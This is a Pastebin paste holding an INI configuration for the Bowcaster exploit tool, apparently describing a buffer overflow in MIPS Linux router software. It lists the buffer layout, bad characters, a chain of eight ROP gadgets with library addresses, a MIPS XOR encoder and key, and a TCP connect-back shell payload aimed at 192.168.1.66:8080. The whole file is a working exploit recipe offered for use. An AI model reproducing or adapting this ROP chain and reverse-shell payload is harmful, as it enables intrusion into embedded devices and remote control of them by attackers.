Advertisement
zcutlip

Bowcaster overflow INI description

Jul 30th, 2013
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. [Overflow Description]
  2. arch = MIPS
  3. os = Linux
  4. endianness = BigEndian
  5. buffer length = 576
  6. bad characters = 0x00,0x0d,0x20
  7.  
  8. [Section 1]
  9. type = RopGadget
  10. offset = 140
  11. description = upnp_context placeholder.
  12. rop_address = 0x0001ecbc
  13. base_address = 0x2aba1000
  14.  
  15. [Section 2]
  16. type = RopGadget
  17. offset = 136
  18. description = The epilogue of sub_b100 in libwlbcmshared.so. Sets up S1-S7.
  19. rop_address = 0x0000b1f8
  20. base_address = 0x2aba1000
  21.  
  22. [Section 3]
  23. type = RopGadget
  24. offset = 168
  25. description = An addr that can be dereferenced & written without crashing.
  26. rop_address = 0x0001ed10
  27. base_address = 0x2aba1000
  28.  
  29. [Section 4]
  30. type = RopGadget
  31. offset = 200
  32. description = Sets up 3 sec arg to sleep(). jumps $s4
  33. rop_address = 0x0004b62c
  34. base_address = 0x2aabe000
  35.  
  36. [Section 5]
  37. type = RopGadget
  38. offset = 184
  39. description = load stack data into ra, then jr $s2
  40. rop_address = 0x000380f0
  41. base_address = 0x2aabe000
  42.  
  43. [Section 6]
  44. type = RopGadget
  45. offset = 176
  46. description = location of sleep() in libc.
  47. rop_address = 0x0004ffd0
  48. base_address = 0x2aabe000
  49.  
  50. [Section 7]
  51. type = RopGadget
  52. offset = 240
  53. description = add offset from $sp into s5, jalr $s6
  54. rop_address = 0x000328f4
  55. base_address = 0x2aabe000
  56.  
  57. [Section 8]
  58. type = RopGadget
  59. offset = 192
  60. description = Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.
  61. rop_address = 0x0001b1f4
  62. base_address = 0x2aabe000
  63.  
  64. [Section 9]
  65. type = EncodedPayloadSection
  66. offset = 268
  67. encoder_class = MipsXorEncoder
  68. description = MIPS XOR decoder stub with 1 payload.
  69. key = 0xb59ed6f3
  70. payloads = Section 10
  71.  
  72. [Section 10]
  73. payload_class = ConnectbackPayload
  74. description = TCP connect-back shell. Target address & port=192.168.1.66:8080
  75. connectback_ip = 192.168.1.66
  76. port = 8080
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement